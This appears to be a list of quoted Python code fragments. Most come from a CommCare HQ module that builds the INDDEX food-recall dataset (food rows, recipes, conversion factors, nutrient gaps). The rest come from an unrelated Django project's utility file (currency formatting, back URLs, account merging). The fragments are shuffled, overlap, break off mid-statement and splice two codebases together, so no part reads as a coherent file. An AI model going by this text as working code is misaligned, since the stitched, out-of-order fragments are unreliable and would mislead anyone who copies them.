"IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc',",
"if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self):",
"from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps,",
"= slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE",
"in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete",
"a recipe, or it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row,",
"in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't",
"self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code:",
"I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS}",
"values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield",
"} self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for",
"have a case of their own. Nonstandard recipes are defined by the user",
"elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc =",
"return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type is",
"IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER),",
"IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR),",
"I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4',",
"master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking =",
"] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking',",
"else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from",
"it's an indicator that hasn't been explicitly set, check if it can #",
"I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'),",
"= 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in",
"row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid]",
"= {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try:",
"been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise",
"request), **{k: [v for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS",
"unified dataset. FoodRow :: Class responsible for row-wise calculations and indicator definitions. \"\"\"",
"a \"food\" case that's a child of this foodrecall. This dataset has a",
"I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range',",
"IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR),",
"pieces and presents the result as a unified dataset. FoodRow :: Class responsible",
"self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe",
"master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount'])",
"total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] +",
"elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code))",
"logic to generate the master dataset for the INDDEX reports Overview -------- Beneficiaries",
"I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10',",
"gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code",
"'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid",
"row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self,",
"descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META),",
"= self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False food_groups =",
"this foodrecall. This dataset has a row for every food, with metadata about",
"food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return",
"_maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient):",
"bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code",
"return None else: # If it's an indicator in the UCR that hasn't",
"self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else:",
"I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'),",
"from the master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount",
"from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references:",
"recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients",
"= ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *,",
"row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name",
"= not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete",
"FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from",
"is not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount *",
"has additional rows inserted for each ingredient. These rows are associated with the",
"specified, show only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if",
"food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by",
"= bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code =",
"IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'),",
"Beneficiaries may report eating a nonstandard recipe more than once, in which case",
"FoodData :: This is the interface to this dataset, it glues together all",
"self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated:",
"the master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount =",
"IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR,",
"= [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self,",
"ingredients again. We need to insert duplicates of the previously reported ingredients into",
"I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR,",
"return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references =",
"lookup table. This dataset has additional rows inserted for each ingredient. These rows",
"this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group",
"in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE)",
"rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def",
"I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR,",
"I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'),",
"IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META),",
"in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions)",
"\"\"\"Generates the primary dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS",
"from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from",
"TypeError: return None def _maybe_float(val): return float(val) if val not in (None, '')",
"self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis =",
"rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows",
"file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS +",
"about the recall session, calculated nutritional information, and auditing columns reporting on what",
"ingredients of the recipe are entered as additional food cases and linked to",
"ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients)",
"set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta =",
"'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures,",
"None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return",
"self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used =",
"owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def",
"self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code =",
"result as a unified dataset. FoodRow :: Class responsible for row-wise calculations and",
"def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return",
"self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections",
"AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated outside the scope",
"gap type is specified, show only rows with gaps of that type gap_type",
"I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER),",
"return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def",
"bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code =",
"}[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients):",
"ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES:",
"in a \"foodrecall\" case. Every food they mention results in the creation of",
"recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe']",
"IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be",
"cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v] for k in",
"recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid]",
"not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe =",
"raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row",
"IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR,",
"== 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed",
"functools import reduce from memoized import memoized from corehq.apps.es import users as user_es",
"self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE)",
"ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in",
"if it can # be pulled from the food fixture or from the",
"def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams,",
"recipes have their ingredients enumerated in the \"recipes\" lookup table. This dataset has",
"*, datespan, filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise",
"filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v",
"IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE),",
"and auditing columns reporting on what data is or isn't available. Some of",
"I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'),",
"if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be \"",
"ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient",
"self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if",
"defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data():",
"self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code':",
"UCR that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr",
"tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be found here:",
"self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor =",
"row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe']",
"and row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw",
"ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients)",
"= self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions",
"row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows",
"res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None return",
"in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid",
"len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type",
"else None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the",
"for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls,",
"in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] =",
"self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe",
"'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE",
"for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property",
"'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs)",
"[ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META),"
] |
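# --- Illustrative sketch, not part of the original module -----------------
# How a report view might wire FoodData together.  `domain` and `request`
# are assumed to come from the surrounding report; 'energy' is a
# hypothetical nutrient name, not something this file defines.
def _example_report_rows(domain, request):
    food_data = FoodData.from_request(domain, request)
    return [
        (row.food_name, row.total_grams, row.get_nutrient_amt('energy'))
        for row in food_data.rows
    ]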
import locale
import os
import re
import string
import unicodedata
import zlib
from datetime import date
from urllib.parse import parse_qs, urlencode

from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.urls import reverse_lazy as reverse
from django.utils.encoding import iri_to_uri, smart_text
from django.utils.functional import lazy
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _

from .conf import settings

MALE = "m"
FEMALE = "f"


def _get_localeconv():
    """
    This function loads localeconv during module load.
    It is necessary, because using locale.setlocale later may be dangerous
    (It is not thread-safe in most of the implementations.)
    """
    original_locale_name = locale.setlocale(locale.LC_ALL)
    locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(".")[0] + ".UTF-8"
    locale.setlocale(locale.LC_ALL, str(locale_name))
    lc = locale.localeconv()
    locale.setlocale(locale.LC_ALL, original_locale_name)
    return lc


localeconv = _get_localeconv()


# This function is inspired by python's standard locale.currency().
def currency(val, international=False):
    """Formats val according to the currency settings for current language."""
    digits = settings.PRICE_DECIMAL_PLACES

    # grouping
    groups = []
    s = str(abs(int(val)))
    for interval in locale._grouping_intervals(localeconv["mon_grouping"]):
        if not s:
            break
        groups.append(s[-interval:])
        s = s[:-interval]
    if s:
        groups.append(s)
    groups.reverse()
    s = smart_text(localeconv["mon_thousands_sep"]).join(groups)

    # display fraction for non integer values
    if digits and not isinstance(val, int):
        s += smart_text(localeconv["mon_decimal_point"]) + "{{:.{}f}}".format(digits).format(val).split(".")[1]

    # '<' and '>' are markers if the sign must be inserted between symbol and value
    s = "<" + s + ">"

    smb = smart_text(localeconv[international and "int_curr_symbol" or "currency_symbol"])
    precedes = localeconv[val < 0 and "n_cs_precedes" or "p_cs_precedes"]
    separated = localeconv[val < 0 and "n_sep_by_space" or "p_sep_by_space"]

    if precedes:
        s = smb + (separated and " " or "") + s
    else:
        s = s + (separated and " " or "") + smb

    sign_pos = localeconv[val < 0 and "n_sign_posn" or "p_sign_posn"]
    sign = localeconv[val < 0 and "negative_sign" or "positive_sign"]

    if sign_pos == 0:
        s = "(" + s + ")"
    elif sign_pos == 1:
        s = sign + s
    elif sign_pos == 2:
        s = s + sign
    elif sign_pos == 3:
        s = s.replace("<", sign)
    elif sign_pos == 4:
        s = s.replace(">", sign)
    else:
        # the default if nothing specified;
        # this should be the most fitting sign position
        s = sign + s

    return s.replace("<", "").replace(">", "").replace(" ", "\u00A0")


def amount_color(amount):
    if amount > 0:
        return settings.LEPRIKON_COLOR_POSITIVE
    elif amount < 0:
        return settings.LEPRIKON_COLOR_NEGATIVE
    else:
        return settings.LEPRIKON_COLOR_ZERO


def ascii(value):
    return unicodedata.normalize("NFKD", value).encode("ascii", errors="ignore").decode("ascii")


def comma_separated(lst):
    lst = list(map(smart_text, lst))
    if len(lst) > 2:
        return _(", and ").join([", ".join(lst[:-1]), lst[-1]])
    else:
        return _(", and ").join(lst)


def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits):
    return "".join([stringset[i % len(stringset)] for i in [x for x in os.urandom(length)]])


def current_url(request):
    if request.META["QUERY_STRING"]:
        return "{}?{}".format(request.path, request.META["QUERY_STRING"])
    else:
        return request.path


def url_back(request):
    return request.POST.get(
        settings.LEPRIKON_PARAM_BACK,
        request.GET.get(
            settings.LEPRIKON_PARAM_BACK,
            reverse("leprikon:summary"),
        ),
    )


recursive_back_splitter = re.compile(f"[?&]{settings.LEPRIKON_PARAM_BACK}=")


def url_with_back(url, url_back):
    try:
        query = url_back.split("?")[1]
    except IndexError:
        pass
    else:
        try:
            # try to reuse original back url
            url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0]
        except KeyError:
            pass
    # remove recursive back url
    url_back = recursive_back_splitter.split(url_back)[0]
    return "{}?{}".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)}))


def reverse_with_back(request, *args, **kwargs):
    return url_with_back(reverse(*args, **kwargs), current_url(request))
"settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return",
"is necessary, because using locale.setlocale later may be dangerous (It is not thread-safe",
"else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst =",
"ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise for attr in",
"def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9:",
"groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s:",
"in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s)",
"# before 1954 if y < 54: year = 1900 + y else:",
"def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\")",
"s = s + (separated and \" \" or \"\") + smb sign_pos",
"url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse original back url",
"else: year = int(date.today().year / 100) * 100 + y if y >",
"SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp",
"): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp:",
"if not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s",
"100 month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year,",
"source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp =",
"target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp",
"tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all():",
"locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return",
"target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined",
"sign) else: # the default if nothing specified; # this should be the",
"s = sign + s elif sign_pos == 2: s = s +",
"\"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first()",
"sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount",
"\"(\" + s + \")\" elif sign_pos == 1: s = sign +",
"os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request):",
"from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as",
"leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: #",
"x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path",
"'>' are markers if the sign must be inserted between symbol and value",
"and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated and \"",
